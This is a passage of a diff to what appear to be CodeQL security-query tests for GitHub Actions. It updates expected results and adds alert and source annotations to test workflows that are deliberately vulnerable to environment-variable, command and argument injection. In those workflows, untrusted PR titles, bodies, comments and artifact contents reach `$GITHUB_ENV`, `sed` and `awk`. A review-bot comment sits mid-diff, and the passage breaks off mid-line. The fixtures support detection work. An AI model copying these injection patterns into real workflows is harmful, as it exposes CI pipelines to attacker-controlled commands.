| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref index b3f6c4bf782..450079a19f6 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref 
+++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvVarInjectionCritical.ql +query: Security/CWE-077/EnvVarInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 94e2af8ecaa..b751cd05888 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | @@ -92,4 +93,3 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref index fc6a3a80c98..cfc44d8a86d 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref 
@@ -1 +1,2 @@
-Security/CWE-077/EnvVarInjectionMedium.ql
+query: Security/CWE-077/EnvVarInjectionMedium.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
index 4b6888449c0..b7968c4f7a6 100644
--- a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
+++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
@@ -6,4 +6,4 @@ jobs:
 steps:
 - uses: ruby/setup-ruby@v2
 with:
- ruby-version: ${{ github.event.comment.body }}
+ ruby-version: ${{ github.event.comment.body }} # $ Alert[actions/command-injection/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
index 281fd39552a..7e3d87977b1 100644
--- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
+++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
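Review bot: The new `# $ Alert[actions/command-injection/critical]` tag on the `ruby-version` line in the comment_issue.yml hunk has no matching `# $ Source[...]` tag, whereas the arg_injection.yml `@@ -7,7 +7,7 @@` hunk in this same commit tags its `TITLE` env line with `# $ Source[actions/argument-injection/critical]`. The CommandInjectionCritical.expected rows in this commit report source and sink at the same location (`comment_issue.yml:9:26:9:57`), so if the postprocessor configured as `utils/test/InlineExpectationsTestQuery.ql` also checks source tags, line 9 would presumably need `# $ Source[actions/command-injection/critical] Alert[actions/command-injection/critical]` — inferred from the arg_injection.yml convention, to be confirmed against the postprocess query. The same question applies to the arg_injection.yml `@@ -18,50 +18,50 @@` hunk, where the `$GITHUB_HEAD_REF` and `BODY=$(git …)` steps receive only `Alert` tags even though the visible ArgumentInjectionCritical.expected rows place their source at the same location as the sink.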
@@ -1,6 +1,6 @@ +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref index 7057e60695b..3dc57e81d63 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-078/CommandInjectionCritical.ql +query: experimental/Security/CWE-078/CommandInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 99ebb1edc05..be81405805b 100644 
--- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected
+++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected
@@ -1,5 +1,5 @@
+#select
 edges
 nodes
 | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body |
 subpaths
-#select
diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref
index 9fbbb302a17..41310436d7e 100644
--- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-078/CommandInjectionMedium.ql
+query: experimental/Security/CWE-078/CommandInjectionMedium.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml
index 5d841e50dbb..2566f6cc674 100644
--- a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml
+++ b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml
@@ -7,7 +7,7 @@ jobs:
 test1:
 runs-on: ubuntu-latest
 env:
- TITLE: ${{github.event.pull_request.title}}
+ TITLE: ${{github.event.pull_request.title}} # $ Source[actions/argument-injection/critical]
 steps:
 - name: Checkout
 uses: actions/checkout@v4
@@ -18,50 +18,50 @@ jobs:
 echo "s/FOO/$TITLE/g"
 - run: |
 # VULNERABLE
- sed "s/FOO/$TITLE/g"
+ sed "s/FOO/$TITLE/g" # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
- echo "foo" | sed "s/FOO/$TITLE/g" > bar
+ echo "foo" | sed "s/FOO/$TITLE/g" > bar # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
- echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar)
+ echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
- awk "BEGIN {$TITLE}"
+ awk "BEGIN {$TITLE}" # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
- sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json
+ sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
- sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json
+ sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
 sed -e 's##${TITLE}#' \
 -e 's##${{ env.sot_repo }}#' \
 -e 's##TITLE#' \
- .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky
+ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
 sed -e 's##TITLE#' \
 -e 's##${{ env.sot_repo }}#' \
 -e 's##${TITLE}#' \
- .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky
+ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
 BODY=$(git log --format=%s)
- sed "s/FOO/$BODY/g" > /tmp/foo
+ sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
 BODY=$(git diff --name-only HEAD)
- sed "s/FOO/$BODY/g" > /tmp/foo
+ sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
 BODY=$(git diff --name-only HEAD )
- sed "s/FOO/$BODY/g" > /tmp/foo
+ sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical]
 - run: |
 # VULNERABLE
 BODY=$(git diff --name-only HEAD^ | xargs)
- sed "s/FOO/$BODY/g" > /tmp/foo
+ sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical]
 - run: |
 # NOT VULNERABLE
 echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT
diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
index 5eddb791ae5..4f4d67c2325 100644
--- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
+++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
@@ -1,3 +1,16 @@ +#select +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # 